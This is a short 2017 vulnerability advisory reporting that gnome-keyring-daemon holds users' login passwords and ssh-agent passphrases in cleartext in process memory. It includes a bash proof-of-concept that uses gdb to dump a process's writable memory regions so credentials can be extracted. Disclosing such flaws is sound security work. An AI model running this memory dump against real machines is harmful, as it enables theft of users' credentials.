Home / os / winmobile

Gnome Keyring Daemon Credential Disclosure

Posted on 24 April 2017

gnome-keyring-daemon is vulnerable to local credentials disclosure. Fortunately the attack can be spun on already compromised machines, but sadly, in those cases, an attacker can leaverage on gnome-keyring-daemon to obtain sensible data. The application store password of logged users in clear text in the process memory, hence expose this information (such of login password, passphrase of ssh-agent, etc.) to an attacker. In this scenario, he can read those data instantly without cracking it or install keylogger, sniffer and variuos tools, but using gnome-keyring-daemon in order to obtain this informations, that can be extracted from memory using a debugger (such of "gdb"). At this URL, there is a script (named "memory_dump.sh") that can be used as PoC: http://www.lucaercoli.it/ memory_dump.sh: #!/bin/bash mkdir $1 cd $1 grep rw-p /proc/$1/maps | awk '{print $1}' | sed 's/-/ /' | while read mem_start mem_end; do gdb --pid $1 --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"; done

 

TOP